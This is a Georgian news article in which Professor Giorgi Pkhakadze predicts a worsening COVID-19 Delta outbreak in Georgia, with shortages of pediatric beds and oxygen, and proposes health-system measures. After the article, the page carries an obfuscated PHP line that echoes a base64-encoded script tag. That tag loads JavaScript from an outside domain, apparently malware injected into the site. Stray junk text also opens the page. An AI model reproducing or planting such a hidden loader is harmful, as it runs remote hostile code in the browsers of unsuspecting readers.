celsiusi
ავერსი შნაიდერი
პროფესორი, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელი, გიორგი ფხაკაძე ქვეყანაში ეპიდსიტუაციის გართულებას პროგნოზირებს, ამბობს რომ საქართველო ინდურ სცენარს იმეორებს და სისტემა მოუმზადებელია. 
 
"დელტა ვირუსი არის საქართველოში. საქართველო იმეორებს ინდურ სცენარს, ერთი ერთში. პედიატრიული (ბავშვთა) საწოლები აღარ გვექნება ქვეყანაში 1 კვირაში. ჟანგბადის დეფიციტი იქნება, ასევე, 1-2 კვირაში”- ამბობს გიორგი ფხაკაძე.
 
მისივე თქმით, აუცილებელია ერთიანი ელექტრონული ჯანდაცვის სისტემა (პაციენტის ელექტრონული ბარათი).
ასევე, პირბადეების ხარისხის ლაბორატორიის ჩამოტანა და გამართვა (ყალბი სამედიცინო პირბადეების ამოღება გაყიდვიდან).
 
“ქვეყნის არჩაკეტვა და მართვა ეპიდემიის რეგიონების მიხედვით (ჩაკეტვა მარტო იმ რეგიონების, სადაც არის ეპიდემიის აფეთქება და არა მთელი ქვეყნის).
 
მწვანე რეგიონების შექმნა (სადაც ეპიდემიის კონტროლი იქნება უფრო მკაცრი).
წითელი სატრანსპორტო კორიდორების გახსნა (რომ ტრანზიტულმა მძღოლებმა არ გაავრცელონ ვირუსი).
საქართველო შეუერთდეს ევროკავშირის ერთიან კოვიდის "QR" კოდების სისტემას, რათა მინიმუმამდე იქნას დაწეული ყალბი “კოვიდ პასპორტების” გამოყენება საქართველოში," - აცხადებს გიორგი ფხაკაძე.
 
 
 
5059
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");